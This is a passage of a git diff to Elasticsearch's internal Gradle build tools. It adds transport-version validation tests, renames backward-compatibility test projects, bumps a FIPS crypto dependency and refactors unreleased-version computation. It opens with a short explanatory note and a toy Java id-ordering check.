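Note: the fixture above pins down the on-disk contract the validation tasks check: each referable definition lives at transport/definitions/referable/<name>.csv and holds a comma-separated id list in descending order (primary id first, backport ids after), while each upper bound file at transport/upper_bounds/<branch>.csv holds a single name,id pair. A toy version of the id-ordering check, for illustration only (the real validation is implemented by the Gradle tasks this patch adds):

    import java.util.Arrays;
    import java.util.List;

    class DefinitionCheck {
        // Parse "8123000,8012001" and verify the ids are strictly descending --
        // the property the "does not have ordered ids" test below asserts on.
        static List<Integer> parseDescendingIds(String csv) {
            if (csv.isBlank()) {
                throw new IllegalArgumentException("definition does not contain any ids");
            }
            List<Integer> ids = Arrays.stream(csv.split(",")).map(String::trim).map(Integer::parseInt).toList();
            for (int i = 1; i < ids.size(); i++) {
                if (ids.get(i) >= ids.get(i - 1)) {
                    throw new IllegalArgumentException("ids are not in descending order: " + csv);
                }
            }
            return ids;
        }
    }
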
+ */ + +package org.elasticsearch.gradle.internal.transport + + +import org.gradle.testkit.runner.TaskOutcome + +class TransportVersionValidationFuncTest extends AbstractTransportVersionFuncTest { + + def "test setup works"() { + when: + def result = gradleRunner("validateTransportVersionResources", "validateTransportVersionReferences").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + result.task(":myserver:validateTransportVersionReferences").outcome == TaskOutcome.SUCCESS + result.task(":myplugin:validateTransportVersionReferences").outcome == TaskOutcome.SUCCESS + } + + def "definitions must be referenced"() { + given: + javaSource("myplugin", "org.elasticsearch.plugin", "MyPlugin", + "import org.elasticsearch.TransportVersion;", """ + static final TransportVersion dne = TransportVersion.fromName("dne"); + """) + when: + def result = validateReferencesFails("myplugin") + then: + assertValidateReferencesFailure(result, "myplugin", "TransportVersion.fromName(\"dne\") was used at " + + "org.elasticsearch.plugin.MyPlugin line 6, but lacks a transport version definition.") + } + + def "references must be defined"() { + given: + referableTransportVersion("not_used", "1000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/not_used.csv] is not referenced") + } + + def "names must be lowercase alphanum or underscore"() { + given: + referableAndReferencedTransportVersion("${name}", "8100000", "TestNames") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/${name}.csv] does not have a valid name, " + + "must be lowercase alphanumeric and underscore") + + where: + name << ["CapitalTV", "spaces tv", "trailing_spaces_tv ", "hyphen-tv", "period.tv"] + } + + def "definitions contain at least one id"() { + given: + referableAndReferencedTransportVersion("empty", "") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/empty.csv] does not contain any ids") + } + + def "definitions have ids in descending order"() { + given: + referableAndReferencedTransportVersion("out_of_order", "8100000,8200000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/out_of_order.csv] does not have ordered ids") + } + + def "definition ids are unique"() { + given: + referableAndReferencedTransportVersion("duplicate", "8123000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] contains id 8123000 already defined in " + + "[myserver/src/main/resources/transport/definitions/referable/duplicate.csv]") + } + + def "definitions have bwc ids with non-zero patch part"() { + given: + referableAndReferencedTransportVersion("patched", "8200000,8100000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + 
"[myserver/src/main/resources/transport/definitions/referable/patched.csv] contains bwc id [8100000] with a patch part of 0") + } + + def "definitions have primary ids which cannot change"() { + given: + referableTransportVersion("existing_92", "8500000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] has modified primary id from 8123000 to 8500000") + } + + def "cannot change committed ids to a branch"() { + given: + referableTransportVersion("existing_92", "8123000,8012002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] modifies existing patch id from 8012001 to 8012002") + } + + def "upper bounds files must reference defined name"() { + given: + transportVersionUpperBound("9.2", "dne", "8123000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.2.csv] contains transport version name [dne] which is not defined") + } + + def "upper bound files id must exist in definition"() { + given: + transportVersionUpperBound("9.2", "existing_92", "8124000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.2.csv] has id 8124000 which is not in definition " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv]") + } + + def "upper bound files have latest id within base"() { + given: + transportVersionUpperBound("9.0", "seemingly_latest", "8110001") + referableAndReferencedTransportVersion("original", "8110000") + referableAndReferencedTransportVersion("seemingly_latest", "8111000,8110001") + referableAndReferencedTransportVersion("actual_latest", "8112000,8110002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.0.csv] has id 8110001 from [seemingly_latest] with base 8110000 " + + "but another id 8110002 from [actual_latest] is later for that base") + } + + def "upper bound files cannot change base id"() { + given: + referableAndReferencedTransportVersion("original", "8013000") + referableAndReferencedTransportVersion("patch", "8015000,8013001") + transportVersionUpperBound("9.1", "patch", "8013001") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.1.csv] modifies base id from 8012000 to 8013000") + } + + def "ids must be dense"() { + given: + referableAndReferencedTransportVersion("original", "8013000") + referableAndReferencedTransportVersion("patch1", "8015000,8013002") + transportVersionUpperBound("9.0", "patch1", "8013002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version base id 8013000 is missing patch ids between 8013000 and 8013002") + } + + def "primary id must not be patch version"() { + given: + referableAndReferencedTransportVersion("patch", "8015001") + when: + def result = 
validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/patch.csv] has patch version 8015001 as primary id") + } + + def "unreferable directory is optional"() { + given: + file("myserver/src/main/resources/transport/unreferable/initial_9_0_0.csv").delete() + file("myserver/src/main/resources/transport/unreferable").deleteDir() + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "upper bound can refer to an unreferable definition"() { + given: + unreferableTransportVersion("initial_10.0.0", "10000000") + transportVersionUpperBound("10.0", "initial_10.0.0", "10000000") + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "referable and unreferable definitions cannot have the same name"() { + given: + unreferableTransportVersion("existing_92", "10000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] " + + "has same name as unreferable definition " + + "[myserver/src/main/resources/transport/definitions/unreferable/existing_92.csv]") + } + + def "unreferable definitions can have primary ids that are patches"() { + given: + unreferableTransportVersion("initial_7.0.1", "7000001") + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "highest id in an referable definition should exist in an upper bounds file"() { + given: + referableAndReferencedTransportVersion("some_tv", "10000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/some_tv.csv] " + + "has the highest transport version id [10000000] but is not present in any upper bounds files") + } + + def "highest id in an unreferable definition should exist in an upper bounds file"() { + given: + unreferableTransportVersion("initial_10.0.0", "10000000") + when: + def result = validateResourcesFails() + then: + // TODO: this should be _unreferable_ in the error message, but will require some rework + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/initial_10.0.0.csv] " + + "has the highest transport version id [10000000] but is not present in any upper bounds files") + } +} diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major1/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major1/build.gradle diff --git 
a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix2/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major2/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix2/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major2/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/maintenance/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major3/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/maintenance/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major3/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major4/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major4/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor1/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor1/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/staged/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor2/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/staged/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor2/build.gradle diff --git a/distribution/bwc/bugfix/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor3/build.gradle similarity index 100% rename from distribution/bwc/bugfix/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor3/build.gradle diff --git a/distribution/bwc/bugfix2/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor4/build.gradle similarity index 100% rename from 
distribution/bwc/bugfix2/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor4/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle index a07060c3be18f..00691191e0fd5 100644 --- a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle +++ b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle @@ -9,14 +9,14 @@ rootProject.name = "root" -include ":distribution:bwc:bugfix" -include ":distribution:bwc:bugfix2" -include ":distribution:bwc:bugfix3" -include ":distribution:bwc:minor" -include ":distribution:bwc:major" -include ":distribution:bwc:staged" -include ":distribution:bwc:staged2" -include ":distribution:bwc:maintenance" +include ":distribution:bwc:major1" +include ":distribution:bwc:major2" +include ":distribution:bwc:major3" +include ":distribution:bwc:major4" +include ":distribution:bwc:minor1" +include ":distribution:bwc:minor2" +include ":distribution:bwc:minor3" +include ":distribution:bwc:minor4" include ":distribution:archives:darwin-tar" include ":distribution:archives:oss-darwin-tar" include ":distribution:archives:darwin-aarch64-tar" diff --git a/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle b/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle index 14e2323b4d14d..7c77fb8cad38f 100644 --- a/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle +++ b/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle @@ -23,11 +23,11 @@ if (buildParams.inFipsJvm) { File fipsSecurity = new File(fipsResourcesDir, javaSecurityFilename) File fipsPolicy = new File(fipsResourcesDir, 'fips_java.policy') File fipsTrustStore = new File(fipsResourcesDir, 'cacerts.bcfks') - def bcFips = dependencies.create('org.bouncycastle:bc-fips:1.0.2.5') + def bcFips = dependencies.create('org.bouncycastle:bc-fips:1.0.2.6') def bcTlsFips = dependencies.create('org.bouncycastle:bctls-fips:1.0.19') def manualDebug = false; //change this to manually debug bouncy castle in an IDE if(manualDebug) { - bcFips = dependencies.create('org.bouncycastle:bc-fips-debug:1.0.2.5') + bcFips = dependencies.create('org.bouncycastle:bc-fips-debug:1.0.2.6') bcTlsFips = dependencies.create('org.bouncycastle:bctls-fips:1.0.19'){ exclude group: 'org.bouncycastle', module: 'bc-fips' // to avoid jar hell } diff --git a/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle b/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle index 51301b405e514..2257ae2d03da9 100644 --- a/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle +++ b/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle @@ -7,19 +7,23 @@ * License v3.0 only", or the "Server Side Public License, v 1". 
*/ -import org.elasticsearch.gradle.VersionProperties +import org.elasticsearch.gradle.Version import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask -def fwcVersions = buildParams.bwcVersions.released.findAll { it.major == VersionProperties.elasticsearchVersion.major && it.minor == VersionProperties.elasticsearchVersion.minor } -def previousMinorSnapshot = buildParams.bwcVersions.unreleased.find { it.major == VersionProperties.elasticsearchVersion.major && it.minor == VersionProperties.elasticsearchVersion.minor - 1 } - -fwcVersions.each { fwcVersion -> - tasks.register("v${fwcVersion}#fwcTest", StandaloneRestIntegTestTask) { - usesBwcDistribution(previousMinorSnapshot) - usesBwcDistribution(fwcVersion) - systemProperty("tests.old_cluster_version", previousMinorSnapshot) - systemProperty("tests.new_cluster_version", fwcVersion) - nonInputProperties.systemProperty 'tests.fwc', 'true' +Version elasticsearchVersion = Version.fromString(versions.get("elasticsearch")) +def fwcVersions = buildParams.bwcVersions.released.findAll { it.major == elasticsearchVersion.major && it.minor == elasticsearchVersion.minor } +def targetMajor = elasticsearchVersion.minor > 0 ? elasticsearchVersion.major : elasticsearchVersion.major - 1 +def targetMinor = elasticsearchVersion.minor > 0 ? elasticsearchVersion.minor - 1 : buildParams.bwcVersions.unreleased.findAll { it.major == targetMajor }*.minor.max() +def previousMinorSnapshot = buildParams.bwcVersions.unreleased.find { it.major == targetMajor && it.minor == targetMinor } +if (previousMinorSnapshot != null) { + fwcVersions.each { fwcVersion -> + tasks.register("v${fwcVersion}#fwcTest", StandaloneRestIntegTestTask) { + usesBwcDistribution(previousMinorSnapshot) + usesBwcDistribution(fwcVersion) + systemProperty("tests.old_cluster_version", previousMinorSnapshot) + systemProperty("tests.new_cluster_version", fwcVersion) + nonInputProperties.systemProperty 'tests.fwc', 'true' + } } } diff --git a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy index 01a3bdaee2337..df4fa43aad3e7 100644 --- a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy +++ b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy @@ -9,18 +9,18 @@ package org.elasticsearch.gradle.internal +import groovy.ant.AntBuilder + import org.apache.tools.ant.BuildListener import org.apache.tools.ant.BuildLogger import org.apache.tools.ant.DefaultLogger import org.apache.tools.ant.Project import org.gradle.api.DefaultTask -import org.gradle.api.GradleException import org.gradle.api.file.FileSystemOperations -import org.gradle.api.tasks.Input import org.gradle.api.tasks.TaskAction -import javax.inject.Inject import java.nio.charset.Charset +import javax.inject.Inject /** * A task which will run ant commands. 
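Note: the rewritten fwc-test script above no longer assumes a previous minor exists inside the current major: for an x.0 release it falls back to the highest unreleased minor of the previous major, and it registers no fwcTest tasks at all when no such snapshot exists. A simplified Java rendering of that selection, with hypothetical types:

    import java.util.Comparator;
    import java.util.List;
    import java.util.Optional;

    record Ver(int major, int minor) {}

    class PreviousMinorSelector {
        // For 9.1 this yields 9.0; for 9.0 it yields the highest unreleased 8.x version.
        static Optional<Ver> previousMinor(Ver current, List<Ver> unreleased) {
            int targetMajor = current.minor() > 0 ? current.major() : current.major() - 1;
            Optional<Integer> targetMinor = current.minor() > 0
                ? Optional.of(current.minor() - 1)
                : unreleased.stream().filter(v -> v.major() == targetMajor).map(Ver::minor).max(Comparator.naturalOrder());
            return targetMinor.flatMap(
                minor -> unreleased.stream().filter(v -> v.major() == targetMajor && v.minor() == minor).findFirst()
            );
        }
    }
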
@@ -83,7 +83,8 @@ public abstract class AntTask extends DefaultTask { return new DefaultLogger( errorPrintStream: stream, outputPrintStream: stream, - messageOutputLevel: outputLevel) + messageOutputLevel: outputLevel + ) } /** diff --git a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy index 88a68f1194858..c09c372800af8 100644 --- a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy +++ b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy @@ -9,6 +9,8 @@ package org.elasticsearch.gradle.internal.test +import groovy.ant.AntBuilder + import org.elasticsearch.gradle.OS import org.elasticsearch.gradle.internal.AntFixtureStop diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java index b6f4c99e3d0e6..bcdd2431d1f01 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java @@ -15,6 +15,7 @@ import org.elasticsearch.gradle.internal.info.BuildParameterExtension; import org.elasticsearch.gradle.internal.precommit.JarHellPrecommitPlugin; import org.elasticsearch.gradle.internal.test.ClusterFeaturesMetadataPlugin; +import org.elasticsearch.gradle.internal.transport.TransportVersionReferencesPlugin; import org.elasticsearch.gradle.plugin.PluginBuildPlugin; import org.elasticsearch.gradle.plugin.PluginPropertiesExtension; import org.elasticsearch.gradle.util.GradleUtils; @@ -36,6 +37,7 @@ public void apply(Project project) { project.getPluginManager().apply(JarHellPrecommitPlugin.class); project.getPluginManager().apply(ElasticsearchJavaPlugin.class); project.getPluginManager().apply(ClusterFeaturesMetadataPlugin.class); + project.getPluginManager().apply(TransportVersionReferencesPlugin.class); boolean isCi = project.getRootProject().getExtensions().getByType(BuildParameterExtension.class).getCi(); // Clear default dependencies added by public PluginBuildPlugin as we add our // own project dependencies for internal builds diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java index 15d13e567ca4b..fc43cf6f7f0f7 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java @@ -9,7 +9,7 @@ package org.elasticsearch.gradle.internal; import org.elasticsearch.gradle.Version; -import org.elasticsearch.gradle.VersionProperties; +import org.elasticsearch.gradle.internal.info.DevelopmentBranch; import java.io.Serializable; import java.util.ArrayList; @@ -24,8 +24,7 @@ import java.util.function.BiConsumer; import java.util.function.Consumer; import java.util.function.Predicate; -import java.util.regex.Matcher; -import java.util.regex.Pattern; +import java.util.stream.Collectors; import static java.util.Collections.reverseOrder; import static java.util.Collections.unmodifiableList; @@ -65,20 +64,13 @@ public class BwcVersions implements Serializable { - private static final Pattern LINE_PATTERN = 
Pattern.compile( - "\\W+public static final Version V_(\\d+)_(\\d+)_(\\d+)(_alpha\\d+|_beta\\d+|_rc\\d+)?.*\\);" - ); private static final String GLIBC_VERSION_ENV_VAR = "GLIBC_VERSION"; private final Version currentVersion; private final transient List versions; private final Map unreleased; - public BwcVersions(List versionLines, List developmentBranches) { - this(versionLines, Version.fromString(VersionProperties.getElasticsearch()), developmentBranches); - } - - public BwcVersions(Version currentVersionProperty, List allVersions, List developmentBranches) { + public BwcVersions(Version currentVersionProperty, List allVersions, List developmentBranches) { if (allVersions.isEmpty()) { throw new IllegalArgumentException("Could not parse any versions"); } @@ -90,20 +82,6 @@ public BwcVersions(Version currentVersionProperty, List allVersions, Li this.unreleased = computeUnreleased(developmentBranches); } - // Visible for testing - BwcVersions(List versionLines, Version currentVersionProperty, List developmentBranches) { - this(currentVersionProperty, parseVersionLines(versionLines), developmentBranches); - } - - private static List parseVersionLines(List versionLines) { - return versionLines.stream() - .map(LINE_PATTERN::matcher) - .filter(Matcher::matches) - .map(match -> new Version(Integer.parseInt(match.group(1)), Integer.parseInt(match.group(2)), Integer.parseInt(match.group(3)))) - .sorted() - .toList(); - } - private void assertCurrentVersionMatchesParsed(Version currentVersionProperty) { if (currentVersionProperty.equals(currentVersion) == false) { throw new IllegalStateException( @@ -127,81 +105,46 @@ public void forPreviousUnreleased(Consumer consumer) { getUnreleased().stream().filter(version -> version.equals(currentVersion) == false).map(unreleased::get).forEach(consumer); } - private String getBranchFor(Version version, List developmentBranches) { - // If the current version matches a specific feature freeze branch, use that - if (developmentBranches.contains(version.getMajor() + "." + version.getMinor())) { - return version.getMajor() + "." 
+ version.getMinor(); - } else if (developmentBranches.contains(version.getMajor() + ".x")) { // Otherwise if an n.x branch exists and we are that major - return version.getMajor() + ".x"; - } else { // otherwise we're the main branch - return "main"; - } - } - - private Map computeUnreleased(List developmentBranches) { + private Map computeUnreleased(List developmentBranches) { Map result = new TreeMap<>(); + Map> bwcBranches = developmentBranches.stream() + .filter(developmentBranch -> developmentBranch.version().before(currentVersion)) + .sorted(reverseOrder(comparing(DevelopmentBranch::version))) + .collect(Collectors.groupingBy(branch -> { + if (branch.version().getMajor() == currentVersion.getMajor()) { + return "minor"; + } else if (branch.version().getMajor() == currentVersion.getMajor() - 1) { + return "major"; + } + return "older"; + })); + + developmentBranches.stream() + .filter(branch -> branch.version().equals(currentVersion)) + .findFirst() + .ifPresent( + developmentBranch -> result.put( + currentVersion, + new UnreleasedVersionInfo(currentVersion, developmentBranch.name(), ":distribution") + ) + ); - // The current version is always in development - String currentBranch = getBranchFor(currentVersion, developmentBranches); - result.put(currentVersion, new UnreleasedVersionInfo(currentVersion, currentBranch, ":distribution")); - - // Check for an n.x branch as well - if (currentBranch.equals("main") && developmentBranches.stream().anyMatch(s -> s.endsWith(".x"))) { - // This should correspond to the latest new minor - Version version = versions.stream() - .sorted(Comparator.reverseOrder()) - .filter(v -> v.getMajor() == (currentVersion.getMajor() - 1) && v.getRevision() == 0) - .findFirst() - .orElseThrow(() -> new IllegalStateException("Unable to determine development version for branch")); - String branch = getBranchFor(version, developmentBranches); - assert branch.equals(currentVersion.getMajor() - 1 + ".x") : "Expected branch does not match development branch"; - - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:minor")); + List previousMinorBranches = bwcBranches.getOrDefault("minor", Collections.emptyList()); + for (int i = 0; i < previousMinorBranches.size(); i++) { + DevelopmentBranch previousMinorBranch = previousMinorBranches.get(i); + result.put( + previousMinorBranch.version(), + new UnreleasedVersionInfo(previousMinorBranch.version(), previousMinorBranch.name(), ":distribution:bwc:minor" + (i + 1)) + ); } - // Now handle all the feature freeze branches - List featureFreezeBranches = developmentBranches.stream() - .filter(b -> Pattern.matches("[0-9]+\\.[0-9]+", b)) - .sorted(reverseOrder(comparing(s -> Version.fromString(s, Version.Mode.RELAXED)))) - .toList(); - - int bugfixCount = 0; - boolean existingStaged = false; - for (int i = 0; i < featureFreezeBranches.size(); i++) { - String branch = featureFreezeBranches.get(i); - Version version = versions.stream() - .sorted(Comparator.reverseOrder()) - .filter(v -> v.toString().startsWith(branch)) - .findFirst() - .orElse(null); - - // If we don't know about this version we can ignore it - if (version == null) { - continue; - } - - // If this is the current version we can ignore as we've already handled it - if (version.equals(currentVersion)) { - continue; - } - - // We only maintain compatibility back one major so ignore anything older - if (currentVersion.getMajor() - version.getMajor() > 1) { - continue; - } - - // This is the maintenance version - if (i == 
featureFreezeBranches.size() - 1) { - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:maintenance")); - } else if (version.getRevision() == 0) { // This is the next staged minor - String project = existingStaged ? "staged2" : "staged"; - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:" + project)); - existingStaged = true; - } else { // This is a bugfix - bugfixCount++; - String project = "bugfix" + (bugfixCount > 1 ? bugfixCount : ""); - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:" + project)); - } + List previousMajorBranches = bwcBranches.getOrDefault("major", Collections.emptyList()); + for (int i = 0; i < previousMajorBranches.size(); i++) { + DevelopmentBranch previousMajorBranch = previousMajorBranches.get(i); + result.put( + previousMajorBranch.version(), + new UnreleasedVersionInfo(previousMajorBranch.version(), previousMajorBranch.name(), ":distribution:bwc:major" + (i + 1)) + ); } return Collections.unmodifiableMap(result); @@ -211,19 +154,6 @@ public List getUnreleased() { return unreleased.keySet().stream().sorted().toList(); } - private void addUnreleased(Set unreleased, Version current, int index) { - if (current.getRevision() == 0) { - // If the current version is a new minor, the next version is also unreleased - Version next = versions.get(versions.size() - (index + 2)); - unreleased.add(next); - - // Keep looking through versions until we find the end of unreleased versions - addUnreleased(unreleased, next, index + 1); - } else { - unreleased.add(current); - } - } - public void compareToAuthoritative(List authoritativeReleasedVersions) { Set notReallyReleased = new HashSet<>(getReleased()); notReallyReleased.removeAll(authoritativeReleasedVersions); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java index 9fbba42d09ad3..387ef5523b23b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java @@ -34,9 +34,12 @@ import java.io.File; import java.util.List; import java.util.Map; +import java.util.Set; +import java.util.stream.Stream; import javax.inject.Inject; +import static java.util.stream.Collectors.joining; import static org.elasticsearch.gradle.internal.util.ParamsUtils.loadBuildParams; import static org.elasticsearch.gradle.util.FileUtils.mkdirs; import static org.elasticsearch.gradle.util.GradleUtils.maybeConfigure; @@ -48,6 +51,8 @@ public abstract class ElasticsearchTestBasePlugin implements Plugin { public static final String DUMP_OUTPUT_ON_FAILURE_PROP_NAME = "dumpOutputOnFailure"; + public static final Set TEST_TASKS_WITH_ENTITLEMENTS = Set.of("test", "internalClusterTest"); + @Inject protected abstract ProviderFactory getProviderFactory(); @@ -172,6 +177,25 @@ public void execute(Task t) { nonInputProperties.systemProperty("workspace.dir", Util.locateElasticsearchWorkspace(project.getGradle())); // we use 'temp' relative to CWD since this is per JVM and tests are forbidden from writing to CWD nonInputProperties.systemProperty("java.io.tmpdir", test.getWorkingDir().toPath().resolve("temp")); + if (test.getName().equals("internalClusterTest")) { + // configure a node home directory independent of the Java temp dir so that 
